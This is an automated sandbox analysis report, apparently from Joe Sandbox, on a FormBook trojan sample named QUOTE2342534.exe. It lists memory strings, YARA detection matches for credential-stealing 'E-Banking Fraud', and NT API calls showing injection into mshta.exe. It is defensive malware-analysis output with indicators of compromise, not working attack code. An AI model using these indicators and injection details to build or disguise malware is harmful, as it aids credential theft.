            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/xmlrpc.php?rsd
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F2CA8 NtQueryInformationProcess,0_2_089F2CA8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F2CA0 NtQueryInformationProcess,0_2_089F2CA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0042C4E3 NtClose,4_2_0042C4E3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762B60 NtClose,LdrInitializeThunk,4_2_01762B60
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01762DF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01762C70
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017635C0 NtCreateMutant,LdrInitializeThunk,4_2_017635C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01764340 NtSetContextThread,4_2_01764340
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01764650 NtSuspendThread,4_2_01764650
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762BF0 NtAllocateVirtualMemory,4_2_01762BF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762BE0 NtQueryValueKey,4_2_01762BE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762BA0 NtEnumerateValueKey,4_2_01762BA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762B80 NtQueryInformationFile,4_2_01762B80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762AF0 NtWriteFile,4_2_01762AF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762AD0 NtReadFile,4_2_01762AD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762AB0 NtWaitForSingleObject,4_2_01762AB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762D30 NtUnmapViewOfSection,4_2_01762D30
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762D10 NtMapViewOfSection,4_2_01762D10
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762D00 NtSetInformationFile,4_2_01762D00
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762DD0 NtDelayExecution,4_2_01762DD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762DB0 NtEnumerateKey,4_2_01762DB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762C60 NtCreateKey,4_2_01762C60
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762C00 NtQueryInformationProcess,4_2_01762C00
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762CF0 NtOpenProcess,4_2_01762CF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762CC0 NtQueryVirtualMemory,4_2_01762CC0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762CA0 NtQueryInformationToken,4_2_01762CA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762F60 NtCreateProcessEx,4_2_01762F60
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762F30 NtCreateSection,4_2_01762F30
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762FE0 NtCreateFile,4_2_01762FE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762FB0 NtResumeThread,4_2_01762FB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762FA0 NtQuerySection,4_2_01762FA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762F90 NtProtectVirtualMemory,4_2_01762F90
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762E30 NtWriteVirtualMemory,4_2_01762E30
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762EE0 NtQueueApcThread,4_2_01762EE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762EA0 NtAdjustPrivilegesToken,4_2_01762EA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762E80 NtReadVirtualMemory,4_2_01762E80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01763010 NtOpenDirectoryObject,4_2_01763010
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01763090 NtSetValueKey,4_2_01763090
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017639B0 NtGetContextThread,4_2_017639B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01763D70 NtOpenThread,4_2_01763D70
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01763D10 NtOpenProcessToken,4_2_01763D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03884340 NtSetContextThread,LdrInitializeThunk,8_2_03884340
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03884650 NtSuspendThread,LdrInitializeThunk,8_2_03884650
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03882BA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03882BE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03882BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882B60 NtClose,LdrInitializeThunk,8_2_03882B60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882AD0 NtReadFile,LdrInitializeThunk,8_2_03882AD0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882AF0 NtWriteFile,LdrInitializeThunk,8_2_03882AF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882FB0 NtResumeThread,LdrInitializeThunk,8_2_03882FB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882FE0 NtCreateFile,LdrInitializeThunk,8_2_03882FE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882F30 NtCreateSection,LdrInitializeThunk,8_2_03882F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03882E80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03882EE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882DD0 NtDelayExecution,LdrInitializeThunk,8_2_03882DD0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03882DF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03882D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03882D30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03882CA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882C60 NtCreateKey,LdrInitializeThunk,8_2_03882C60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03882C70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038835C0 NtCreateMutant,LdrInitializeThunk,8_2_038835C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038839B0 NtGetContextThread,LdrInitializeThunk,8_2_038839B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882B80 NtQueryInformationFile,8_2_03882B80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882AB0 NtWaitForSingleObject,8_2_03882AB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882F90 NtProtectVirtualMemory,8_2_03882F90
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882FA0 NtQuerySection,8_2_03882FA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882F60 NtCreateProcessEx,8_2_03882F60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882EA0 NtAdjustPrivilegesToken,8_2_03882EA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882E30 NtWriteVirtualMemory,8_2_03882E30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882DB0 NtEnumerateKey,8_2_03882DB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882D00 NtSetInformationFile,8_2_03882D00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882CC0 NtQueryVirtualMemory,8_2_03882CC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882CF0 NtOpenProcess,8_2_03882CF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03882C00 NtQueryInformationProcess,8_2_03882C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03883090 NtSetValueKey,8_2_03883090
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03883010 NtOpenDirectoryObject,8_2_03883010
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03883D10 NtOpenProcessToken,8_2_03883D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03883D70 NtOpenThread,8_2_03883D70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F48E10 NtCreateFile,8_2_02F48E10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F48F80 NtReadFile,8_2_02F48F80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F49280 NtAllocateVirtualMemory,8_2_02F49280
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F49070 NtDeleteFile,8_2_02F49070
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F49110 NtClose,8_2_02F49110
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_00EFD3040_2_00EFD304
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F8B700_2_089F8B70
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F50200_2_089F5020
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F00400_2_089F0040
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F33FC0_2_089F33FC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089FD8480_2_089FD848
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089FBB800_2_089FBB80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F8B620_2_089F8B62
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F1C800_2_089F1C80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F8C220_2_089F8C22
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F1C700_2_089F1C70
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F2E280_2_089F2E28
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089FBFB80_2_089FBFB8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F20B80_2_089F20B8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F50120_2_089F5012
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F00060_2_089F0006
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F52B00_2_089F52B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F52A20_2_089F52A2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089FD4100_2_089FD410
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089F25780_2_089F2578
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_089FB7480_2_089FB748
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 0_2_0EF41B880_2_0EF41B88
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004185434_2_00418543
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0040284A4_2_0040284A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004028504_2_00402850
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004100934_2_00410093
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004031504_2_00403150
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0040E1134_2_0040E113
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0042EB034_2_0042EB03
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0040FE6E4_2_0040FE6E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0040FE734_2_0040FE73
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004167334_2_00416733
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B81584_2_017B8158
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CA1184_2_017CA118
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017201004_2_01720100
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E81CC4_2_017E81CC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F01AA4_2_017F01AA
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E41A24_2_017E41A2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C20004_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EA3524_2_017EA352
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E3F04_2_0173E3F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F03E64_2_017F03E6
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D02744_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B02C04_2_017B02C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017305354_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F05914_2_017F0591
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E24464_2_017E2446
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D44204_2_017D4420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DE4F64_2_017DE4F6
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017307704_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017547504_2_01754750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172C7C04_2_0172C7C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174C6E04_2_0174C6E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017469624_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A04_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017FA9A64_2_017FA9A6
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173A8404_2_0173A840
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017328404_2_01732840
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E8F04_2_0175E8F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017168B84_2_017168B8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EAB404_2_017EAB40
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E6BD74_2_017E6BD7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA804_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CCD1F4_2_017CCD1F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173AD004_2_0173AD00
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172ADE04_2_0172ADE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01748DBF4_2_01748DBF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730C004_2_01730C00
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720CF24_2_01720CF2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0CB54_2_017D0CB5
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A4F404_2_017A4F40
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01750F304_2_01750F30
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D2F304_2_017D2F30
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01772F284_2_01772F28
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173CFE04_2_0173CFE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01722FC84_2_01722FC8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AEFA04_2_017AEFA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730E594_2_01730E59
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EEE264_2_017EEE26
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EEEDB4_2_017EEEDB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742E904_2_01742E90
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017ECE934_2_017ECE93
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171F1724_2_0171F172
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017FB16B4_2_017FB16B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176516C4_2_0176516C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173B1B04_2_0173B1B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E70E94_2_017E70E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EF0E04_2_017EF0E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DF0CC4_2_017DF0CC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017370C04_2_017370C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171D34C4_2_0171D34C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E132D4_2_017E132D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0177739A4_2_0177739A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D12ED4_2_017D12ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174B2C04_2_0174B2C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017352A04_2_017352A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E75714_2_017E7571
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CD5B04_2_017CD5B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017214604_2_01721460
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EF43F4_2_017EF43F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EF7B04_2_017EF7B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017756304_2_01775630
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E16CC4_2_017E16CC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017399504_2_01739950
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174B9504_2_0174B950
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C59104_2_017C5910
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179D8004_2_0179D800
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017338E04_2_017338E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EFB764_2_017EFB76
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A5BF04_2_017A5BF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176DBF94_2_0176DBF9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174FB804_2_0174FB80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A3A6C4_2_017A3A6C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EFA494_2_017EFA49
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E7A464_2_017E7A46
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DDAC64_2_017DDAC6
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CDAAC4_2_017CDAAC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01775AA04_2_01775AA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D1AA34_2_017D1AA3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E7D734_2_017E7D73
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E1D5A4_2_017E1D5A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01733D404_2_01733D40
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174FDC04_2_0174FDC0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A9C324_2_017A9C32
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EFCF24_2_017EFCF2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EFF094_2_017EFF09
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EFFB14_2_017EFFB1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01731F924_2_01731F92
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01739EB04_2_01739EB0
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_041AB58A7_2_041AB58A
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_04194FCA7_2_04194FCA
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418C8FA7_2_0418C8FA
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418C8F57_2_0418C8F5
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_041931BA7_2_041931BA
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418CB1A7_2_0418CB1A
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418AB9A7_2_0418AB9A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0385E3F08_2_0385E3F0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039103E68_2_039103E6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390A3528_2_0390A352
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038D02C08_2_038D02C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038F02748_2_038F0274
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039041A28_2_039041A2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039101AA8_2_039101AA
